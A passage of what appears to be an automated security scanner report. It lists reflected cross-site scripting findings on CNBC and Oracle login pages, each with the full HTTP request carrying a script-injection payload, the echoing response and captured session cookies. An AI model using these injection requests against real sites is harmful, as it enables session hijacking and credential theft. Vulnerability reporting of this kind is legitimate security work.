HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:04:47 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Language: en Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Length: 88588 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-...[SNIP]... <form method="post" name="loginForm" action="login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check9b9cd"><script>alert(1)</script>792007f2f0 &login_view=register">...[SNIP]...
3.44. https://login.cnbc.com/cas/login [login_view parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://login.cnbc.com
Path:
/cas/login
Issue detail
The value of the login_view request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f224b"><script>alert(1)</script>829e8aaba58 was submitted in the login_view parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=registerf224b"><script>alert(1)</script>829e8aaba58 HTTP/1.1 Host: login.cnbc.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:02:11 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Language: en-US Keep-Alive: timeout=15 Connection: Keep-Alive Content-Type: text/html;charset=ISO-8859-1 Content-Length: 88659 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-...[SNIP]... <form method="post" name="loginForm" action="login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=registerf224b"><script>alert(1)</script>829e8aaba58 ">...[SNIP]...
3.45. https://login.cnbc.com/cas/login [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://login.cnbc.com
Path:
/cas/login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 55fd4'><script>alert(1)</script>bb9117bee86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register&55fd4'><script>alert(1)</script>bb9117bee86 =1 HTTP/1.1 Host: login.cnbc.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:02:37 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Language: en-US Keep-Alive: timeout=15 Connection: Keep-Alive Content-Type: text/html;charset=ISO-8859-1 Content-Length: 88638 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-...[SNIP]... <iframe name="regFrame" frameborder="0" class="registerFrame" style='height:800px;' scrolling="no" src='https://register.cnbc.com/registerUser.do?iframe=yes&source=register&55fd4'><script>alert(1)</script>bb9117bee86 =1'>...[SNIP]...
3.46. https://login.cnbc.com/cas/login [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://login.cnbc.com
Path:
/cas/login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67364"><script>alert(1)</script>6e7c0304749 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register&67364"><script>alert(1)</script>6e7c0304749 =1 HTTP/1.1 Host: login.cnbc.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:02:35 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Language: en-US Keep-Alive: timeout=15 Connection: Keep-Alive Content-Type: text/html;charset=ISO-8859-1 Content-Length: 88638 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-...[SNIP]... <form method="post" name="loginForm" action="login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register&67364"><script>alert(1)</script>6e7c0304749 =1">...[SNIP]...
3.47. https://login.cnbc.com/cas/login [service parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://login.cnbc.com
Path:
/cas/login
Issue detail
The value of the service request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload beaf8"><script>alert(1)</script>27bcb15f035 was submitted in the service parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_checkbeaf8"><script>alert(1)</script>27bcb15f035 &login_view=register HTTP/1.1 Host: login.cnbc.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:02:09 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Language: en-US Keep-Alive: timeout=15 Connection: Keep-Alive Content-Type: text/html;charset=ISO-8859-1 Content-Length: 88589 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-...[SNIP]... <form method="post" name="loginForm" action="login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_checkbeaf8"><script>alert(1)</script>27bcb15f035 &login_view=register">...[SNIP]...
3.48. https://login.cnbc.com/cas/login [source parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://login.cnbc.com
Path:
/cas/login
Issue detail
The value of the source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34868"><script>alert(1)</script>3f8471aa8dc was submitted in the source parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&source=header34868"><script>alert(1)</script>3f8471aa8dc &login_view=header HTTP/1.1 Host: login.cnbc.com Connection: keep-alive Referer: http://www.cnbc.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=91914748D5C5843DB9029C8B383DFD63; __qca=P0-1380789371-1315338919989; TZM=-300; s_cc=true; __qseg=Q_D; s_nr=1315339382427; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DFront%25257CHome%25257Chomeus%25257C15839285%25257CStock%252520Market%252520News%25252C%252520Business%252520News%25252C%252520Financial%25252C%252520Earni%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/%252523%2526ot%253DA; cnbc_regional_cookie=US
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:03:32 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Language: en-US Content-Length: 5727 Keep-Alive: timeout=15 Connection: Keep-Alive Content-Type: text/html;charset=ISO-8859-1 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-...[SNIP]... <form method="post" name="loginForm" action="login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&source=header34868"><script>alert(1)</script>3f8471aa8dc &login_view=header">...[SNIP]...
3.49. https://login.cnbc.com/cas/login [source_type parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://login.cnbc.com
Path:
/cas/login
Issue detail
The value of the source_type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb331"><script>alert(1)</script>a8ddc251ca7 was submitted in the source_type parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cas/login?service=http%3A%2F%2Flogin.cnbc.com%2Ftpauth%2Fj_acegi_cas_security_check%3Bjsessionid%3D525F22D55B66231C5B585C2AC1574EF8&source_type=procb331"><script>alert(1)</script>a8ddc251ca7 &apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asp&login_view=subscription HTTP/1.1 Host: login.cnbc.com Connection: keep-alive Referer: http://pro.cnbc.com/index.asp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=91914748D5C5843DB9029C8B383DFD63; __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; TZM=-300; s_cc=true; s_nr=1315339339586; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CPassword%252520Reset%25257CEmail%2526pidt%253D1%2526oid%253Dhttp%25253A//pro.cnbc.com/%2526ot%253DA
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:02:54 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Language: en-US Content-Length: 7137 Keep-Alive: timeout=15 Connection: Keep-Alive Content-Type: text/html;charset=ISO-8859-1 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-...[SNIP]... <form method="post" name="loginForm" action="login?service=http%3A%2F%2Flogin.cnbc.com%2Ftpauth%2Fj_acegi_cas_security_check%3Bjsessionid%3D525F22D55B66231C5B585C2AC1574EF8&source_type=procb331"><script>alert(1)</script>a8ddc251ca7 &apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asp&login_view=subscription">...[SNIP]...
3.50. https://login.oracle.com/oam/server/sso/auth_cred_submit [request_id parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/oam/server/sso/auth_cred_submit
Issue detail
The value of the request_id request parameter is copied into the HTML document as plain text between tags. The payload c1951<script>alert(1)</script>81611ea9517 was submitted in the request_id parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /oam/server/sso/auth_cred_submit?v=v1.4&request_id=-11174233175931698103c7b4%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Ed6751adef14af5029c1951<script>alert(1)</script>81611ea9517 HTTP/1.1 Host: login.oracle.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: p_org_id=1001; p_lang=US; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1315342940933; gpv_p24=no%20value; gpw_e24=no%20value; OAM_REQ=VERSION_4~NxywdvpcawCyMkTM4G71qJsOq72hZVWrUNC3MjhZV9f3dtJf5aL3%2flDPZgqxy71LbJwEeSlEW%2bymPmYi5xnQd1VhYNUy5BAaQuWYV1QPtKgkHgViQXuu26%2fj9P%2bw7wamSRLoSY38UWPAZZDVHEosIjfK91K4L24lW4XlijkOrHkWMnkThMoCKL%2bm%2fkypFHNQZbPrecqEbxIQ%2fmL1U5EjmghHZqmMKsGwfiolkoWQOZxYTitVababmv1AA2pygpRMHDHB3W0UuNa9IPK%2bWkEj7AzlwgJ%2fsOwSy6GgL4C6l6NBQqxbGALlu6wLGhs5CKMzrVnQuA9NYhkBoYNMq%2bCeiIvgzIykEQVBwnmmKyvVvDqW8dGr%2fTLu5ygIeagS0vuoz7CbOcyEcz27f8vx5%2fqclvJSD7mbtCvuMPbprZKgdGRSci3Z0qQF4Jkyj7YVT2LV008x7AIUy3QkD0rVEoH2xVeMEOUn7VAou3g28%2b%2bOUB3OZroMTKz273KYFOQk3bQBOTUoFLCR%2bQyOlwxMhhIJ46nIPIAn%2fcQ5NZtupalbBJ7rQNdrYpyvQGz%2bdftIr%2ff31bi1Diah8geTQiyN4%2fZ3KcMqlP9TnOuY5hEGmm4wObcg5WglrQVYV7isRF6AWRkd%2bk1kEROGepai8RjtcAegR%2b5Z%2bvUec4r7a%2b75gZc48dgS%2faR8ruh9CTlAwpKcFob2kF%2bHchzeWKHKjkNcAWhSbGFjrK4swdSEankx6biqm5UVJCpSmc%2fAq%2f1fgZR9sjRHHVSxrgB8EnObY98hf1BCukBz8mQps1PektbRn%2fALeHk%2fS9pVnjKwJFaXsNxsZt7TeEYc%2b71Dnk%2fz8YCzpWeR%2f%2bPl8unuOYUH1q44XoUMeLi1%2bADiVqRneB63%2ftWzOWBp50u1N%2bTy1Kxey3dC%2fdoECGY5XNp5zCsHkUZul5sxXdCUW8lNpPzmarHhun73cOKwJBV7ogKTADKqN7ertSGyqCCjzSMI40kgozmLHU2oD9JDPg28mWXowW1qliMYnh%2ffjkD6OqiHp3Y%2fzNYwnBP7Zh%2buj2%2fyGD%2fPaFWIi6cQrOgRdNlcb0Xc%2fl97NrLc8abdD%2f2un8kDJBUiE8023fM0yFwVHx6uFPqFC%2b%2fngCymDqp1UfTNFD5jCD6p7puTqmmLhUDn6xfgKkZhyCMLrpj26EuwcS7RSm7%2fS%2bkrjH5E3lHwAy7ss%2f4F2fNwASHfwHnFJSGkvYhLj3AL5tPNeNBKhhv%2bn4YDvdI65VI%2f985I9wzT5mDJ1xu6Z4lWDWiA5b8LGOn1dLaUvEN64D5Z53%2bY53LwfiQwVsaYFhOkJuG8Xp1nQWOuaPahq6jJTJgjFzJwBnE%2fGjHnoymO2FRpu48mOQooisWYBNUBz8Z8XWYk59Pmpr2QbX2lyJwghsEhfdMEBFfE4FIJ0sX93gHzRH9UUOwvWTsKqVZu82K6yOUAOUr7etnP4vYyxqUss0NXMcoXF7HQftpSaRbwpUtZ1B8F3feEjs9tBu45afXQ%2f%2fSOWltFnIIGzJzbE%2fvCkj9em8VBWnmiD%2bV3rKjz97EImPLbVavhHui4v98zrLQqvLqqytf%2fVCeOVu1MWD3zkUoC%2boXnBk%2bQw92SwOYQPwwouiBG%2b28Wl1QaypOncFf99oGzCgdaVMoKy7I1ClMk7jlTETTOWm09pk1afrjvV4tOZQ%2bz59ytqFim1FRiwWoC6yqRWJo%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:18:57 GMT Set-Cookie: OAM_REQ=VERSION_4~EsY9351n%2bL75TyUMNl8LPW73mzYZPslZUdvAtbyf8I%2fsrrJG5gzSLEfs2wZO0aEEm%2f3JWzNmG5jKe1aJAnCDP45JBWjpLTnQMtc34bOV7V2iNl%2bMrXJxYSb8XBcWr%2foOxZLH36duZJi1Fm4481Kymq8RinvKKwEhGJLJOFo2%2fB0wEjM60VcUlsN%2fKUtXh4CgEjVg7oZzDAHzJEz0lBT0G0mYFIZUWbAwWFsi8vdddXkh3cGZotSc7eeh%2boqhYbRAAiGh1v7c4RTA%2fxqbZqQ9pHeY3qYge8IjHXdqcNQnfDNGI0eFb4QBv1JTF2%2fKIjJfwvgdn6nr1SICR86ih13Yu1t2KpaAAYmeonATsz0XlE%2bU6kXqcKnt0dInUlPhrsLbWee5NP9%2f19mt6gV9zPvaM7hDwtQuWCcNU4htv8gXHjTQBxsA%2b2SvZtvr0kIZkXlmkGg%2fb%2foAVB9D0pFXD6Ggh9cdooUvzY4viPGsxAfoI%2f591d7glZBOLkgUvS48uK6RRu8NbzYWHtpXaa%2bYmBTshVsE13YQpK4ObNWjS72Y5vFAmdYi7HisthZdJD%2bHKoa%2bOdwh7tD%2fYIf3aJj78SR9ufKcbtbzLYE6SRCixeTUyhCUnGsbtdI31KyQLmKtrx2kgJDwqmaIim5jLj099PmJF0gU0RYjYzuUbYwR45faQYsxxEoQ7mnGRwfyy5s4fmWlSX9cHmRyX8MW2EPSMraeHUpS33ko2QOwyIrkrEHFOjXrYfd%2b2yVFLS9IXJUiBwGSoRAF1LeDE2dHSjlLkLsSWTwm7oTRF98APeVSfu2R1J4uop1cWyJRFoJExHTDPjtafiU719gvppS0djK92osAheYsmsO4A9K3cLOBuVRPQJluOSLGsSFMpr%2fbqQYp6y8T0dAMi3Ds%2f9%2foCumvkBAgtzYNYsKhiKGbLTi0rzOD4e0jK0hoVDZrNvRpgKBl%2fvq0kUxndQ5un4EUFmbJp%2fE%2b%2bnjaGwCuXkMTK%2buWsVLQyiaxJS4EiCg42C4vv1PHJL1C9jHFtkkgU1fdTb6Yx6Wj2uU%2fByUOD94IPUfC%2bNe0cX%2fHcutt3ZxhT%2bkDMxUxcjIDBZv%2bjbISVrlcqGQ4ntNi2PSo9U2Gqrt1AeNkQ3K%2bzddfzhCG1M6bw8RoPiwzmjq6cLwQnbDKRHZqcJjGfW6FmionsHL4QaXJXEnlW88m9xVGQSZ8pIn1nBQJU26i68WyubXHx7jGY2yvR2Ru5kgn8PI0iaAsSWrmDsmvWI5v6Kf4i7P5Nm8CFY9TxPTz849yBwTijE5fAsm7L4F8CLSmt89c98WJd6N%2bEFyMapg9wfYYko62Zd7HhEbEhmauhmH7HnDCWwkjxJy%2fKRi2RxzUptRMTQ%2bgSnCV5RACLDybfDacI5duyXUFjDqxPyka7YQMifwTXMqc3I7yEM18nPI3Y3g6Pn4vS9bIKfmfbkDjkPf1Lu%2fz%2bNBXWNYccZhpG%2bndCyVP9CMRwLXGXxi85ZQvMKNEb8UzlaokmVmoMOXLkDYZyao7nbTJz7HzACTg%2bJOPN6ODWcwIr%2bbaGqTdMQQqLBa1KUkkVHx33BbHmyWSx6md0HukHmNASFcrFOuUkzd1RgurnTT7F%2bWo7huPmYTZ5pkYL%2fxHh5nXWaUsT%2f%2bHJ3LgdFdRvSgHzSSKQXl2K5HA%2bafmHtpxAgjYIr%2f12UctTk8YSf1XNIlrJjw3oLycqG3pChKZPr1DE%2bJjgVSTtL8VOC5tisuN5sEc%2fl3lM1yEGpm4LlDAWVY0D4v03%2brC9QMFtOF2qj%2bg0QZ2QxGggBLrs9B%2bf5L2cszHFtNSmEPvb0x6UIkFqgSfaz3bAKqM6VzRhBOrRC9lTl6C1unvfpSlrjT5Atd7Wplo72DP7htU9fVHm50C9vn8vTujqBCpXdmpzbEbwHbDMvwGy5GJOgva64ea0ayQeOm1Rr1jzwXX9BMO8dpefvXa5fo6IpgF%2bDE5jAf5JfBDwNyAFF51SwB5L6xBQndB1cLNqYJqdOBQUg%3d%3d; path=/; HttpOnly X-ORACLE-DMS-ECID: 0000J8zYGTK6uHK6EVADUS1EHWFB01tbde X-Powered-By: Servlet/2.5 JSP/2.1 Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:18:57 GMT; path=/ Content-Length: 2709 <html><body onLoad="document.myForm.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p...[SNIP]... </script>d6751adef14af5029c1951<script>alert(1)</script>81611ea9517 ">...[SNIP]...
3.51. https://login.oracle.com/oam/server/sso/auth_cred_submit [request_id parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/oam/server/sso/auth_cred_submit
Issue detail
The value of the request_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c7b4"><script>alert(1)</script>d6751adef14af5029 was submitted in the request_id parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /oam/server/sso/auth_cred_submit?v=v1.4&request_id=-11174233175931698103c7b4"><script>alert(1)</script>d6751adef14af5029 &OAM_REQ=VERSION_4%7EJ%252bfeWWARH78WMpFJOLLGVUaRBF0iddeiIoA1LmJs3Zi2CBr930JrQXvEg5gR0D8CAKQpein0puIJXVs1LFOsylMRwLPa8jg%252bXGpdVzIgWlvOmNfLCLjGzyojV1e4Vsk17THxQww8kKlGYXjlBF8phTLPz7FI%252bA5qofyVKAyO62Bauuu8qVF1ScS09pAcprUPivm3VFJ3H5Kgz%252flJzu7m9%252f1lXhQDZkvLYt%252bMMnr4kZSTqEAn9vkNTKCbSHhBs0EUMI62DsRPc2MSDv4g1v0UwyMn3mebBESr8TTmvRhios3MzyBQhvf4I8rM%252fwXpbFtlj2kGJ%252fPqDr5kNPmwYSFtqmYYyGN4nDSX09LufeZZN3FlT9ZvAMl4iCN9nhBlvG%252f%252fTaJw60iM1r1bkP3UdKVDfmpD8NuXDMqMi4EmV59%252fDEO%252fCYluZce8U%252bGGbT0K9o1sJA4XjxLL8%252f8AfNO%252fwgLKh%252bDofILOF3mRDkIRf68MKMzc7HUeCDu5YQ%252f1ao%252btvjJSu1MtNbwWjD8UmI6Bp%252bTRkGCB7OF6jAdOMmIOVBu7THJ6KSU4L2SAbPlMUQlqLLsH%252fcJMIXtw%252fqvMnBDKHrGSfc6r0RkyylnyMFuScSmd2qNULSeekz8BY7KTly4hiDnDSMlMYTLsixuo8%252b9NDEIshLoOT5kTmeXiCg0FTyr8YewQcLMAvb%252bbfWK8%252f54EneCznHCw32Dn13%252f%252b2dACr4TQeKM9Oua%252f%252bwnu%252bOKIUvCRMS7vWgTjRO5gee3ULhUyKtCENay%252bEYtLfegFYrD2T0tDzB1GcqWTZNEakL6GXMmgGKiTmFoSSXp8dcSso8oEAuAiYBSqM5GloP4Tob3Eft%252fPItNWUsY%252bqbZrilhUtsGtHuzBCTxKPfedNGX1FZuFxXwXbxwkdlHTEmzyTEyl%252fk2aJmyp8Ow%252fyV0o9SYR315eigxpsxzO3ZMFEmBad28OBM9tv5Pvi9O7Ri7Q%252bEXUOC%252f6G2f3htenFJenmnMekNtGu%252fXfaFZL8GjhhVe5W2JhMe%252bJLRaBu8X6ZoE54ocXwfJwUo5hV8m0jaq6DZYEXyrG149pUJzc6I26AH9jHtgcxBbozuQyyY7iwuNWhOqKPudiCfywcM6XktYPrp2zFS3bTkcQ8Rm6HRrZb%252fvB%252bACTy9lrXfSV77QwN%252buu6srum69cLBP5lmPul32t8OVdMpNiivhpmtV7Dbbe5zn%252bkIHj0PhVUbDcErrcfZVnIYDRRjINSbq089YfH3YmFdPktBdvcIhNNztLg2Tbbvh%252fD4y50BLNBJCH%252b8a6B8NLIOqiOoU%252fCEYSRHDnFZv5HTMnTiqJZ%252bljcmdaGu3BPZkHEknjwJ%252frdJN%252fF4KZDIxyB3z0Gc63SxU5%252bTOVa2gKg9LLQNB2%252bsQr1foYzGQLqnMUwF00FaWT2AYkTr5c%252fdnUfUIBSwOj5Q05wkiqOMB51WrBiy3GxzQhmyIU1H7mWj7BSJ%252f010hrRBg%252bfmeiP3OsSN7fXl67GS9KXjTcmXcpDpxRcQH8ZtVHtHmu8ImroMw8P6EovYOrU6HMbmDgwrjXvJbIlFOtbYI56UcoWsOz8MB99rzf65Ik4OZR0TJ7aAd2xC8u19T21z0udibFuvVGvxJuHLh%252f5w%253d%253d&site2pstoretoken=v1.2%7E15AB5291%7ECA7268AF16FDDCD6192ED08700B7C3B3CA2E1B23878BCD93247A950FAAA266F9D7A7C11B2586EEC1681E7C0613B1F158706D3CA7C179F2B6A77573D5C53030D02597238CD1C3E0212AE912A5703E640DF935186B51AB3DFAEEE7B2A7E20FF4542015DBB0457891C5A4461CB4B4A23EB51909CE24B245C0A7CB1A8EBE5AC1C84D4342665B366BF177D22BAC7C46B7421C202F9871EF6C385B9C84ABA7DAB0DE4470E2A9204FA9C682&locale=&ssousername=xss&password=xss HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp Cache-Control: max-age=0 Origin: https://login.oracle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_pers=%20s_nr%3D1315343775191%7C1317935775191%3B%20gpv_p24%3Dno%2520value%7C1315345575196%3B%20gpw_e24%3Dno%2520value%7C1315345575201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleotnlive%253D%252526pid%25253Dotn%2525253Aen-us%2525253A%2525252Fcommunity%2525252Fdeveloper-vm%2525252F%252526pidt%25253D1%252526oid%25253Dotn%2525253Aen%2525253Ahnav%2525253Astore%2525253Astoredatabase%2525253Astoredatabaseseeall%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; s_nr=1315343778351; 